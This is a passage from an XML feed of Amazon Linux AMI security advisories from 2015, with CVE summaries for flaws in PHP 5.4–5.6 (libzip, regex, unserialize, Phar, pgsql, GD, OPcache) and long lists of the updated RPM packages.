epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.23-1.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-508</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-508: important priority package update for php56</title><issued date="2015-04-15 21:50:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pgsql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.7" release="1.110.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-ldap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.7" 
release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.7" release="1.110.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-xml-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.7" release="1.110.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-embedded-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.7" release="1.110.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-dba-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.7-1.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-509</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-509: important priority package update for php54</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-2783:
CVE-2015-2301:
A use-after-free flaw was found in PHP's phar (PHP Archive) paths implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.
1194747:
CVE-2015-2301 php: use after free in phar_object.c
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to functions such as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2014-9709:
A buffer over-read flaw was found in the GD library. A specially crafted GIF file could cause an application using the gdImageCreateFromGif() function to crash.
1188639:
CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709" title="" id="CVE-2014-9709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301" title="" id="CVE-2015-2301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783" title="" id="CVE-2015-2783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mbstring" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.40" release="1.68.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-enchant-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" 
version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.40" release="1.68.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mysqlnd-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.40" release="1.68.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-tidy-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.40" release="1.68.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mcrypt-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.40-1.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-510</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-510: low priority package update for php55</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to functions such as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2015-1351:
A use-after-free flaw was found in PHP's OPcache extension. This flaw could possibly lead to the disclosure of a portion of server memory.
1185900:
CVE-2015-1351 php: use after free in opcache extension
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351" title="" id="CVE-2015-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-dba" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.24" release="1.100.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-intl-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" 